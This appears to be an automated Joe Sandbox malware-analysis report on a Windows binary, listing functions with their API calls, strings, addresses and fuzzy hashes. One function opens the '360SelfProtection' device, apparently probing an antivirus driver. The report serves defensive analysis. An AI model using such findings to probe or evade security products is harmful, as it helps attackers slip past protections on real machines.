Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ItemWindow$CallMessageProcSend
String ID:
API String ID: 2403035917-0
Opcode ID: 74f97d6e3c5723eeedde19186d1ccd7f33653ea1bbf389f701a1dfd3d64a2c1c
Instruction ID: 6786e5e74bdb40cd0859d4b85b93e044d228ded6b7d38720e25f9d1a7b1c6ac5
Opcode Fuzzy Hash: 74f97d6e3c5723eeedde19186d1ccd7f33653ea1bbf389f701a1dfd3d64a2c1c
Instruction Fuzzy Hash: C0414471B00105BBDB24CF18D894E6B77A9EB98751F14953AE8098B352D738EC49CB28

Function 0044E590 Relevance: 7.6, APIs: 5, Instructions: 59libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0044E5A8
_memset.LIBCMT ref: 0044E5C6
GetCurrentProcessId.KERNEL32 ref: 0044E5D2

Part of subcall function 0044D7A0: CreateFileW.KERNEL32(\\.\360SelfProtection,00000080,00000003,00000000,00000003,00000000,00000000,?), ref: 0044D7C2

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0044E60D
LoadLibraryW.KERNEL32 ref: 0044E622

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileModule$CreateCurrentHandleLibraryLoadNameProcess_memset
String ID:
API String ID: 2606892308-0
Opcode ID: 2d378d8137bf286bc2442f9025dc69fb9612536ce2b08e05aa3e7fa4bdd0725e
Instruction ID: d94a8efb88a648c79ce7a2197391e053e36834648fcec17235d1e45d9b802593
Opcode Fuzzy Hash: 2d378d8137bf286bc2442f9025dc69fb9612536ce2b08e05aa3e7fa4bdd0725e
Instruction Fuzzy Hash: C411A572A001185BEB10BBA6AC056EF7368EF54315F4105BEFE05D3242EE385E568BDD

Function 004AA470 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004E40A8,004AA8C9,?,00001000,?,00000000,00001000), ref: 004AA475
LeaveCriticalSection.KERNEL32(004E40A8,?,?,004E4028), ref: 004AA49D
LeaveCriticalSection.KERNEL32(004E40A8,?), ref: 004AA4F1

Strings

(@N, xrefs: 004AA4C3

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID: (@N
API String ID: 2978645861-2818764248
Opcode ID: a0c3b3daa29bfa4189656d82790d8a136bb242fb50074e129ce51e60f281b0c3
Instruction ID: da59f3a5de333eabb256a7be73b97da816f0e36ca79450be3947466fb61e47b7
Opcode Fuzzy Hash: a0c3b3daa29bfa4189656d82790d8a136bb242fb50074e129ce51e60f281b0c3
Instruction Fuzzy Hash: 4501083EA042806BD7518769A804B5B3BD4EBE7B12F15427EF98087391C66D9C48C32E

Function 0046D130 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0046D135
SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0046D152
SendMessageW.USER32(?,00001101,00000000,FFFF0000), ref: 0046D168
GetClassLongW.USER32(?,000000E6), ref: 0046DD6D
SetClassLongW.USER32(?,000000E6,00000000), ref: 0046DD7D

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClassLongMessageSend$Window
String ID:
API String ID: 3838149799-0
Opcode ID: 171bac4a4b15c482de88bc6861024ab99c158d73caf80854c13f2fbbd7c30270
Instruction ID: 72ded996bdb5aac44491e5691eccb04ee748c0e2eca6d36c847f6a6ed28ca7a6
Opcode Fuzzy Hash: 171bac4a4b15c482de88bc6861024ab99c158d73caf80854c13f2fbbd7c30270
Instruction Fuzzy Hash: F401A231F0871067C630BB6AEC45F4B239C5F84B50F10461AB115D62D4EAA8E801876E

Function 00444600 Relevance: 7.5, APIs: 5, Instructions: 49threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,0043D612), ref: 0044460D
GetCurrentThreadId.KERNEL32 ref: 00444613
LeaveCriticalSection.KERNEL32(?), ref: 0044463F
LeaveCriticalSection.KERNEL32(?), ref: 00444653
LeaveCriticalSection.KERNEL32(?), ref: 00444667

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$Leave$CurrentEnterThread
String ID:
API String ID: 2905768538-0
Opcode ID: 48c3365be456e69c38792874bc02d6ce321f47a72e1faf2863876e342a46f018
Instruction ID: 9fd2ec6da090b03a266953b404545f0a2167e51fb7a0dd56e9dae6a2765b04a3
Opcode Fuzzy Hash: 48c3365be456e69c38792874bc02d6ce321f47a72e1faf2863876e342a46f018
Instruction Fuzzy Hash: 1E01313A3011219B9B105FB9BC4895AB3A9EBC5A76311073FFA15D3261CB39EC01869C

Function 004924EB Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004924F7

Part of subcall function 00493E12: __getptd_noexit.LIBCMT ref: 00493E15
Part of subcall function 00493E12: __amsg_exit.LIBCMT ref: 00493E22

__amsg_exit.LIBCMT ref: 00492517
__lock.LIBCMT ref: 00492527
InterlockedDecrement.KERNEL32(?), ref: 00492544
InterlockedIncrement.KERNEL32(004DBFA0), ref: 0049256F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: ec39a07a53b1fb87dea2d308df436eb8949990230ea863193436d1826a43d929
Instruction ID: 7b58c1805217bfa1243444889c2cdd4b285adf1c6ea72e9bdd8169ee41ce574b
Opcode Fuzzy Hash: ec39a07a53b1fb87dea2d308df436eb8949990230ea863193436d1826a43d929
Instruction Fuzzy Hash: 3D01A532902612B7CF15BB6A9955B5E7B60AB04B24F45413BE80063381CB7C9D51CBDD

Function 0048C860 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0048C87E

Part of subcall function 00498F22: __mtinitlocknum.LIBCMT ref: 00498F38
Part of subcall function 00498F22: __amsg_exit.LIBCMT ref: 00498F44
Part of subcall function 00498F22: EnterCriticalSection.KERNEL32(?,?,?,0049F87E,00000004,004CD540,0000000C,004956B7,00000104,?,00000000,00000000,00000000,?,00493DC4,00000001), ref: 00498F4C

___sbh_find_block.LIBCMT ref: 0048C889
___sbh_free_block.LIBCMT ref: 0048C898
HeapFree.KERNEL32(00000000,00000104,004CCF20,0000000C,00498F03,00000000,004CD298,0000000C,00498F3D,00000104,?,?,0049F87E,00000004,004CD540,0000000C), ref: 0048C8C8
GetLastError.KERNEL32(?,0049F87E,00000004,004CD540,0000000C,004956B7,00000104,?,00000000,00000000,00000000,?,00493DC4,00000001,00000214), ref: 0048C8D9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: f0df74bff2548eabd0d5e7aead0b02a42e16e7b8fb6c5b7b517cbdb3993b94d8
Instruction ID: 37416baaaaa4a8fedffa96a7fd59b41a6501cbbfe9fd35fc4104acc3da91138d
Opcode Fuzzy Hash: f0df74bff2548eabd0d5e7aead0b02a42e16e7b8fb6c5b7b517cbdb3993b94d8
Instruction Fuzzy Hash: D601A231985301EADF247B769C4A75E3B689F0132AF14093FF408AA1C1CF3C89458B6C

Function 0045E970 Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0045E975
OpenMutexW.KERNEL32(001F0001,00000000,?,?,00465868), ref: 0045E992
GetLastError.KERNEL32(?,00465868), ref: 0045E99C
CloseHandle.KERNEL32(00000000,?,00465868), ref: 0045E9BC
DestroyWindow.USER32(?,?,00465868), ref: 0045E9C6

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CloseDestroyErrorHandleLastMutexOpen
String ID:
API String ID: 1468468148-0
Opcode ID: 19a5fc912070102aafda8e131be308ed1bd7412c02d9a6c75f6a602a74787fc4
Instruction ID: 33dab0c8709179d15137cc52d378e2cfd7b9d0d142e94031476c919a29004ac5
Opcode Fuzzy Hash: 19a5fc912070102aafda8e131be308ed1bd7412c02d9a6c75f6a602a74787fc4
Instruction Fuzzy Hash: 6FF030B1600700DFD7689B75D94DB6777EDBB44702F544A2DF842C6691CB78E804CB18

Function 00472090 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 459COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004723DE
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?), ref: 004723FE

Strings

\..\, xrefs: 004723B6
j)F, xrefs: 004720BE

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FullNamePath_memset
String ID: \..\$j)F
API String ID: 2554471374-2307207292
Opcode ID: 1b4045b28796c15d52f1317b1aad7747d8893830a086f33a958b6ccf7191bfb4
Instruction ID: d9fcb76202b8c92c2036ff5ccb9d87a47571da3a3f785901b21d90a2ee1cc94f
Opcode Fuzzy Hash: 1b4045b28796c15d52f1317b1aad7747d8893830a086f33a958b6ccf7191bfb4
Instruction Fuzzy Hash: 8D12BF719012159FCB21EB68CD85BDEB3B0AF84314F1482DAE41D67281DB78AF85CB99

Function 00466350 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 360COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000001,?,00000000,00000000,8600C000,00010100,00000000,?), ref: 00466761

Strings

T9N, xrefs: 00466477
T9N, xrefs: 00466494
IDS_DATE_TIME_FMT, xrefs: 004663A8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ShowWindow
String ID: IDS_DATE_TIME_FMT$T9N$T9N
API String ID: 1268545403-4252793494
Opcode ID: c575310137a067cb433eb9c4be9593b416a010c577d6bae7e6d705c00c67d65d
Instruction ID: 6e9d00e1c43c49f898589a134176e963eef41d57f069eba1c746a3cb215e7b45
Opcode Fuzzy Hash: c575310137a067cb433eb9c4be9593b416a010c577d6bae7e6d705c00c67d65d
Instruction Fuzzy Hash: E7E1A3709002159FDB14DF68CC85B9EB7B4EF44314F1582EAE419AB392DB38AE84CF95

Function 0045F3D0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0045F3F7
EnterCriticalSection.KERNEL32(?), ref: 0045F40A
LeaveCriticalSection.KERNEL32(?), ref: 0045F421

Strings

FileSmasher\fssettingsdlg.xml, xrefs: 0045F464

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread
String ID: FileSmasher\fssettingsdlg.xml
API String ID: 2351996187-127305721
Opcode ID: 98c111f001227bbe38c43d55f76c9782229e4a4ee5a86391921764b28ed2c225
Instruction ID: 06e512287f4f31030c1d745f82a748d2ff3e9f1d64eac65b71e10482713b32ae
Opcode Fuzzy Hash: 98c111f001227bbe38c43d55f76c9782229e4a4ee5a86391921764b28ed2c225
Instruction Fuzzy Hash: F5C19971A00205AFEB10DBA5CC41B9FB7B8AF59704F14416EF904BB2C2D779AD05CBA9

Function 00434A80 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 00434C80
OffsetRect.USER32(?,00000000,?), ref: 00434CB3

Strings

9JC, xrefs: 00434B8B, 00434BAA, 00434C20

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Rect$CopyOffset
String ID: 9JC
API String ID: 2534530997-834187432
Opcode ID: 1a4de4537bebdcceec2ff5366f230f98d351bbc075665106340619d513d7fa48
Instruction ID: 9b066e3f8fdced23daec9e69e548ea301ea4f196c710a7fa38ee4cd0e35d0dd2
Opcode Fuzzy Hash: 1a4de4537bebdcceec2ff5366f230f98d351bbc075665106340619d513d7fa48
Instruction Fuzzy Hash: 5CC17071A01209DFDB10DF98C880AEEB7B9FF89304F24915EE505AB341C779AE45CBA5

Function 00475310 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00475364
_malloc.LIBCMT ref: 00475465
SetLastError.KERNEL32(00000008,00002000,00000000), ref: 00475475

Part of subcall function 00476A00: _malloc.LIBCMT ref: 00476A0C
Part of subcall function 00476A00: SetLastError.KERNEL32(00000008,00000000,004753D0,00000000,00002000,00000000), ref: 00476A1E

Strings

K, xrefs: 004755A4

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast_malloc$_memset
String ID: K
API String ID: 1834304950-2603926571
Opcode ID: 8157a3103159435c9e70fd18bae37180e289edf82a48c27a5bdab160100dea04
Instruction ID: 79a83e034b8192ee180689b62ee602156435399583b823f68bdc193e659a02a0
Opcode Fuzzy Hash: 8157a3103159435c9e70fd18bae37180e289edf82a48c27a5bdab160100dea04
Instruction Fuzzy Hash: C1A1ADB15083459BD720DF15D8807ABB7E4ABC4308F54892EF88D8B341E7B8D949CB9B

Function 0043A1E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 270COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0043A24F

Part of subcall function 0048F048: RaiseException.KERNEL32(?,00000000,P0@,?,?,?,?,?,00403050,?,004CD820,?), ref: 0048F08A

Strings

H3K, xrefs: 0043A21A
H3K, xrefs: 0043A230, 0043A233
invalid map/set<T> iterator, xrefs: 0043A215

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionException@8RaiseThrow
String ID: H3K$H3K$invalid map/set<T> iterator
API String ID: 3976011213-2057606363
Opcode ID: d0fdc09fa719472789528ced921393a27c75ae4c0d1d379dc25fa9a86b603212
Instruction ID: 9317064ab4661ae0508ddb319b9aa231e58ca3e46406a00c9d616f5597bee9ca
Opcode Fuzzy Hash: d0fdc09fa719472789528ced921393a27c75ae4c0d1d379dc25fa9a86b603212
Instruction Fuzzy Hash: 87C1A2709442409FDB51CF15C0C4B5ABBA1AF59318F68E08ED8854F392C3BAEC96CF96

Function 00467270 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

ILCreateFromPath.SHELL32(?), ref: 004673E8
SHOpenFolderAndSelectItems.SHELL32(00000000,00000000,00000000,00000000), ref: 004673FB
ILFree.SHELL32(00000000), ref: 00467402

Strings

T9N, xrefs: 004672F5

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateFolderFreeFromItemsOpenPathSelect
String ID: T9N
API String ID: 2141796731-185908819
Opcode ID: d443bb9a2771e604b1c971b7a9815781e66fac8bc1872021363a3a01ec66a52e
Instruction ID: f28cc566f851d3ea4b1337854989df8c10adae0466c19ad60a483fbd0a3932a4
Opcode Fuzzy Hash: d443bb9a2771e604b1c971b7a9815781e66fac8bc1872021363a3a01ec66a52e
Instruction Fuzzy Hash: 22519171A04205DFCB10EFA9D881AAFB7B5FF84314F10455AED149B341DB38AD41CBAA

Function 0044B2D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 0044B36B
_memset.LIBCMT ref: 0044B3B9
